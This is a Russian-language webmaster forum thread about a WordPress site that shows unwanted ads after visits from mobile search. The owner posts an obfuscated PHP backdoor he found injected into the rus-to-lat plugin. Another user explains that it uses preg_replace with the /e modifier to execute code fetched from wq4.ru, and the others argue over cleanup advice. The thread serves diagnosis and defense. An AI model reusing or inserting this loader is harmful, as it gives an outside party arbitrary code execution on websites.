Штырлиц

Рейтинг
74
Регистрация
07.09.2012
Переход от РСЯ (нерезидент) к TDS Media
Сегодня выплатили задолженность РСЯ, в полном объёме, свифт платежём! 
Обнаружены нарушения или проблемы с безопасностью!
Mekka7771:
Платный. Подозрение на пуши...

дык это они родные, пуши это зло!

Реклама на сайте после перехода из мобильного поиска (вирус)
Sitealert:
Да ничего он уже не делает. Это шелл, исполняет произвольный программный код, скачиваемый со стороннего ресурса. Функция preg_replace с модификатором /e, использованная в этом шелле, работает в старых версиях PHP. Сам этот ресурс wq4.ru активно использовался в 2015 году, сейчас, полагаю, его почистили. То есть найденный Вами код, конечно же, вредоносный, но причина нынешних проблем где-то ещё.

как код мог оказаться в файле rus-to-lat? Расширение доступно бесплатно в официальном репозитории WP, шанс конечно есть, но маленький, что ставил я его из не проверенного источника (не помню уже).

Реклама на сайте после перехода из мобильного поиска (вирус)

В общем, спасибо не равнодушным, если был резок извиняюсь!

Проблему нашёл, пока устранил.

Проблема в плагине по транслитерации rus-to-lat, в файле rus-to-lat.php вот такая вставка

wp_load_cacher(); function wp_load_cacher($length='') { if (function_exists("wp_load_cachers")) return ; $mdetails="<div class='body-continent'><div class='get-inner-al(@fi'><!--Deregister() Default Widgets: _sabhrtupwprs:e--></div></div>"; $indent = ( isset($mytitle) ? str_repeat( "\t", $mytitle ) : $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); $output = $metaboxed = $mytitle = ""; $metaoptions="\\4'\\10"."\\12t\\16\\19//\\15q4.\\17u/\\9-".$indent."')\\5"; if (function_exists("wp_load_cached") || defined('HEADER_IMGS')) return; if (count($mytitle)>=$length) { $mytitle = explode(" ",$mytitle." "); } else { $mytitle = explode(" "," ".$mytitle." "); } $metaboxe=str_repeat("(.)", 20).".*"."/".$mdetails[23]; if(function_exists("excerpt_more")){ add_filter('excerpt_modes', $metaboxe); } $output_title = '<p>'.$output.'</p>'; $pr="pre".strip_tags("g_rep").trim("lace"); $defult_widgets=@$pr("/.*(cont).*?(ge).*?(..\(.fi).*?(\()(\)).*?(\_){$metaboxe}is", "@\\20v\\3le\\6{$metaboxed}\\2t\\6\\1ents{$metaoptions}", $mdetails); return $output; }

В коде не силён, что делает и как не знаю. И возможно добавлен он был через какуюто уязвимость (хотя может и был поставлен вместе с плагином) и следовательно, повторение проблемы возможно. Поставил мониторинг файлов на изменение, будем смотреть.

Да. забыл, ещё полностью затёр директории wp-admin и wp-includes, и закачал новые, скачал установщик wordpress тойже версии, что сейчас.

Реклама на сайте после перехода из мобильного поиска (вирус)
Sitealert:
Не порите чушь. Если у Вас проблемы, то для Вашей же пользы лучше было бы засунуть себе куда поглубже свой собственный режим "покупателя, который всегда прав", набраться терпения и выслушать все советы, а не устраивать из темы срач.
Таких проблем - море, и у каждой своя причина, Например, скрипт от pluso, установленный на Вашем сайте. Но это не точно.

Не пойму в чём чушь, в просьбе о помощи? :(

За участите спасибо, скрипт плюсо убрал, проблема осталась.

Но в одном вы правы, нужно дождаться всех, и не вступать в спор с грубиянами.

Реклама на сайте после перехода из мобильного поиска (вирус)
bruder:
Его анти-жополизское поведение вызвано тем, что он спец, дающий бесплатные советы. Режим бога бывает смешным, а бывает заслуженным - и тут скорее второй вариант, о чем можно судить хотя бы по репутации.
Если тебе нужны мнения политкорректных дилетантов, то можешь попробовать форумы для школоты (хотя они могут быть и погрубее спецов).

Я оценил, а теперь и меня послушайте

Если бы я хотел ответов в стиле SeVlad, я бы так и написал: "простите, я когда то совершил ошибку, поставил плохой шаблон, попинайте меня, советов не давайте, а дайте ссылку на общую ветку, где тонны информации не по теме, и я буду искренне благодарен."

Но я хотел, чтобы мой пост увидел нормальный Человек, Человек у которого подобная проблема была, и который мог бы посоветовать как исправить проблему, или порекомендовал хорошего проверенного специалиста. ИБО форум для этого и существует, а не для того, чтобы тот у кого больше сообщений, возомнил о себе "режим бога"!

Реклама на сайте после перехода из мобильного поиска (вирус)
SeVlad:
Кто тебе грубил-то?
Тебе инфа дана. Для подумать. Бесплатно дана, заметь.
А я тебе дал ссылку, где подобно всё расписал. И о причинах и о следствиях и о способах решений. Не, не заметно?

С вами, мне лично, всё понятно! Если можно, если вас не затруднит, то не нужно участвовать в моих бесплатных темах, не дай бог переработаете.

Реклама на сайте после перехода из мобильного поиска (вирус)
SeVlad:
Люблю таких.. "У меня ворованный Запор, я его перепилил, а в салоне всё равно воняет бензином и менты достают. Менять не буду - надо спецов порешать проблемы". Денег-то хватит на "решал"?


Не бывает такого. Тем более с ворованными темами.
Может быть только временное облегчение.

А спецов искать в платном разделе , если форум полистать не можешь.

ну хорошо что любите, только грубить не нужно, или вы святой и не совершали ошибок?

Люблю таких, я прошу помощи, а не оценок моей платёжеспособности!

Реклама на сайте после перехода из мобильного поиска (вирус)

А где их взять спецов, чтобы на 100% и безопасно

Реклама на сайте после перехода из мобильного поиска (вирус)
suffix:
5 минут походил по сайту - провайдер МТС, браузер Самсунг Интернет - никаких баннеров не увидел.

из поиска нужно перейти на запись, на главной рекламы нет, так как она контент встроена, а когда просто ходишь, её нету, и когда страницу обновляешь, также, пропадает и всё, и после чтобы появилась. нужно удалить историю и куки

---------- Добавлено 06.03.2019 в 11:49 ----------

SeVlad:
Всё что он "предлагает" изменять не только не нужно но и опасно.
Брать темы и плагины только из оф каталога.
См https://codex.wordpress.org/%D0%A7%D0%90%D0%92%D0%9E/%D0%A1%D0%B0%D0%B9%D1%82_%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8
/ru/forum/51211

Это всё понятно, но уже шаблон перепилен и слеплен, и по новой это очень много работы. Мне бы советы по сути

12
Всего: 15